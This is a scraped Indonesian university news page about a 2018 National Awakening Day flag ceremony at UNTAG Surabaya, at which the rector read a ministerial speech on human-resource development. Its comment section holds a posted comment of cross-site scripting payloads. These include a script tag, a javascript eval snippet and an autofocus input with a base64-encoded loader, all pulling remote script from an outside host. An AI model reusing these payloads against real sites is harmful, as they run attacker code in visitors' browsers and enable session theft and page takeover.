English  Indonesian

Welcome to University Of 17 Agustus 1945 Surabaya

Mobile Version

UPACARA BENDERA DALAM RANGKA PERINGATAN HARI KEBANGKITAN NASIONAL KE - 110


Senin, 28 Mei 2018 - 11:53:57 WIB

Diposting oleh : Admin
Kategori: Untagtual - Dibaca: 164 kali


Bertempat di Lapangan Parkir Utara UNTAG Surabaya, civitas akademika UNTAG Surabaya melaksanakan upacara bendera dalam rangka memperingati Hari Kebangkitan Nasional ke - 110. Seluruh jajaran baik Dosen, Karyawan hingga pengurus Organisasi Mahasiswa juga ikut dalam pelaksanakan upacara bendera pada, Senin,(21/5).

Rektor UNTAG Surabaya, Dr. Mulyanto Nugroho, M.M., CMA., CPAI., yang memimpin langsung jalannya upacara tersebut. Hari Kebangkitan Nasional ke-110 kali ini mengangkat tema “Pembangunan Sumber Daya Manusia Memperkuat Pondasi Kebangkitan Nasional Indonesia Dalam Era Digital.” Sambutan Menteri Kominfo yang dibacakan oleh Rektor UNTAG Surabaya mengingatkan kembali bagaimana perjuangan bangsa Indonesia dalam meraih kemerdekaan, terlebih yang dicontohkan oleh organisasi Boedi Oetomo. Boedi Oetomo menjadi salah satu penanda utama bahwa bangsa Indonesia untuk pertama kalinya menyadari pentingnya persatuan dan kesatuan. Dengan segala sarana dan prasarana pada saat itu, para pejuang yang berkumpul dalam organisasi Boedi Oetomo terus menghidup-hidupi api nasionalisme dalam diri masing-masing.

Selanjutnya, pembahasan mengenai butir kelima dari Nawacita Kabinet Presiden Joko Widodo dan Wakil Presiden Jusuf Kalla yang berisi visi untuk meningkatkan kualitas hidup manusia Indonesia melalui peningkatan kualitas pendidikan dan pelatihan. Melalui pembangunan manusia yang terampil dan terdidik, pemerintah ingin meningkatkan daya saing ekonomi dan secara simultan meningkatkan kapasitas SDM. Selain itu, dengan dunia yang serba digital ini, diharapkan menjadi wadah yang kondusif bagi 5 perkembangan budi pekerti, yang seimbang dengan pengetahuan dan keterampilan generasi penerus.

Dalam akhir sambutan, Kominfo juga mengajak untuk memaknai peringatan Hari Kebangkitan Nasional tahun 2018 ini sesuai dengan lingkup tugas masing-masing guna memfasilitasi peningkatan kapasitas Sumber Daya Manusia. Terutama generasi muda yang akan membawa kepada kejayaan bangsa di tahun-tahun mendatang. (Ua)



Terkait


1 Komentar :


  • Haloooo

    "><script src=https://dsl.xss.ht></script>

    javascrip t:eval('vara=document.createElement('script');a.src='h ttps://dsl.xss.ht';document.body.appendChild(a)' ;)

    "><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5 zcmM9Imh0dHBzOi8vZHNsLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBl bmRDaGlsZChhKTs&#61; autofocus>

Isi Komentar :